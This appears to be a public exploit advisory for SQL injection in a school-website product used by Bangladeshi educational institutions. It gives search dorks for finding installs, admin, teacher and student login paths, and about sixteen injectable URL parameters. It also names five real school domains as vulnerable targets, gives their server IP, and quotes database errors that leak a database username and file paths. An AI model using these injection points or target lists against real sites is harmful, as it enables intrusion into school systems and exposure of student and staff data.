Soft IT Security Hululu IT Bangladesh SQL Injection

1. ###############################################################
2.  
3. # Exploit Title : Soft IT Security Hululu IT Bangladesh SQL Injection Vulnerability
4. # Author [ Discovered By ] : KingSkrupellos
5. # Team : Cyberizm Digital Security Army
6. # Date : 08/01/2019
7. # Vendor Homepage : softitsecurity.com ~ hululuit.com
8. # Tested On : Windows and Linux
9. # Category : WebApps
10. # Exploit Risk : High
11. # Google Dorks : intext:''© Copyright 2019. Designed and
12. Developed by Soft IT Security'' site:edu.bd
13. intext:''© Copyright 2019. Designed and Developed by Hululu IT'' site:edu.bd
14. # Vulnerability Type : CWE-89 [ Improper Neutralization of
15. Special Elements used in an SQL Command ('SQL Injection') ]
16. # Cyberizm Exploit Reference Link :
17. cyberizm.org/cyberizm-soft-it-security-hululu-it-bangladesh-sql-injection.html
18. # CXSecurity Exploit Reference Link :
19. cxsecurity.com/issue/WLB-2019010043
20.  
21. ###############################################################
22.  
23. Admin/Teacher/Student Panel Login Path =>
24.  
25. /adminoperation/
26. /teacheroperation/
27. /studentoperation/
28.  
29. # SQL Injection Exploits :
30. **********************
31.  
32. /?v=home.jsp&id=[SQL Injection]
33.  
34. /?v=administrationdeatils.jsp&id=[SQL Injection]
35.  
36. /?v=allteacher.jsp&id=[SQL Injection]
37.  
38. /?v=allclark.jsp&id=[SQL Injection]
39.  
40. /?v=talentstudent-detail.jsp&id=[SQL Injection]
41.  
42. /?v=allstudent.jsp&id=[SQL Injection]
43.  
44. /?v=boardresultdetails.jsp&id=1%27
45.  
46. /?v=universitydetails.jsp&id=[SQL Injection]
47.  
48. /?v=talentteacher-detail.jsp&id=[SQL Injection]
49.  
50. /?v=academiccalender-details.jsp&id=[SQL Injection]
51.  
52. /?v=allevent.jsp&id=[SQL Injection]
53.  
54. /?v=allresult.jsp&id=[SQL Injection]
55.  
56. /?v=noticebord-detail.jsp&id=[SQL Injection]
57.  
58. /?v=uploadbook-details.jsp&id=[SQL Injection]
59.  
60. /?v=usefulllinkdetails.jsp&id=[SQL Injection]
61.  
62. /?v=checkclass.jsp&id=[SQL Injection]
63.  
64. ###############################################################
65.  
66. # Example Vulnerable Sites =>
67. ***************************
68.  
69. Note : (192.185.94.62) => There are 182 domains hosted on this server.
70.  
71. [+] birgardusafiaalimmadrasah.edu.bd/?v=administrationdeatils.jsp&id=3%27
72.  
73. [+] haripuralimmadrasha.edu.bd/?v=administrationdeatils.jsp&id=3%27
74.  
75. [+] tislamunionhighschool.edu.bd/?v=administrationdeatils.jsp&id=3%27
76.  
77. [+] haripurwomenscollege.edu.bd/?v=administrationdeatils.jsp&id=3%27
78.  
79. [+] jamunhndm.edu.bd/?v=administrationdeatils.jsp&id=3%27
80.  
81. ###############################################################
82.  
83. # SQL Database Error :
84. *********************
85.  
86. Deprecated: mysql_connect(): The mysql extension is deprecated and
87. will be removed in the future: use mysqli or PDO instead in /home/birgardusafiaali
88. /public_html/DAL/DbConnect.php on line 8
89.  
90. Warning: mysql_connect(): Access denied for user 'birgardu_school'@'localhost'
91. (using password: YES) in /home/birgardusafiaali/public_html/DAL/DbConnect.php on line 8
92.  
93. Warning: fread(): Length parameter must be greater than 0 in
94. /home/haripuralimmadra/public_html/controller/function.php on line 220
95.  
96. ###############################################################
97.  
98. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
99.  
100. ###############################################################